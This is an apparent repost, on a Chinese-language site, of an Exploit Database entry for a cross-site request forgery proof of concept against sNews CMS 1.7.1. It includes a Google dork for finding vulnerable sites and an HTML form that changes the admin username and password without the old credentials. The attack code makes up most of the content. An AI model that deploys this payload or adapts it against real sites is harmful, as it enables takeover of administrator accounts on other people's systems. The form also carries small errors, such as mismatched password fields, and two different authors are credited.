sNews 1.7.1 – Cross-Site Request Forgery

• Exploit Database
• 119 阅读

• 作者： Amir.ght
  日期： 2016-11-03
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/40705/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28

  # Exploit Title : Snews CMS Cross Site Request Forgery # Author : Ashiyane Digital Security Team # Google Dork : "This site is powered by sNews" # Date :1/11/2016 # Type : webapps # Platform : PHP # Vendor Homepage : http://snewscms.com/ # Software link : http://snewscms.com/download/snews1.7.1.zip # Version : 1.7(latest) #######################################################3 Change Username and Password of admin We Dont need old user name and old password <html> <!-- CSRF PoC--> <body> <form name="form0" action="http://localhost/?action=process&task=changeup" method="POST"> <input type="hidden" name="uname" value="Attacker" /> // new username <input type="hidden" name="pass1" value="Attacker" /> //new password <input type="hidden" name="pass2" value="Atacker" />// repeat new password <input type="hidden" name="task" value="changeup" /> <input type="submit" name="submit_pass" value="Save" /> </form> </body> </html> #################################################### ######### exploit by: Amir.ght ##################### ####################################################